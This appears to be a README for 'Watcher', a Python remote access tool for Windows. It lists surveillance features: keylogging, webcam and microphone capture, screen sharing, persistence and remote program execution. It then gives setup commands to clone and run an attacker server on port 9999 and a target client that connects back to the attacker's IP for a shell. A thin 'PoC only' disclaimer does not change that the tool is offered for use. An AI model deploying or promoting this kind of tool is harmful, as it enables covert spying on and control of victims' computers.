This is a python-based remote administration tools for windows.
Watcher is a python-based that used C2 concept, Persistence mechanism, and post-exploitation techniques.
Made this like 1 year ago and decide to finally post this. Reminder that this is only a PoC project and cannot be used for real surveilance and any illegal activities.
- Screen shot & Screen sharing
- Webcam streaming & Webcam snap
- Persistence
- Keylogging
- Download & Upload File
- Program execution & Program killing
- Mic recording
- Keystroke
- Get user & process ID
python version 3.8 or higher
Windows OS - for client
Windows/Linux OS - for server
Type Windows + R to open windows run, then type "cmd" and press enter.
Copy the text below:
cd Desktop && git clone https://github.com/average-joe44/Watcher
cd Watcher
pip install -r requirements.txt
python attacker.py
Server binds to 9999
python target.py
Change the place holder "ip" in target.py into your attacker machine ip and you should have a shell replica that moment.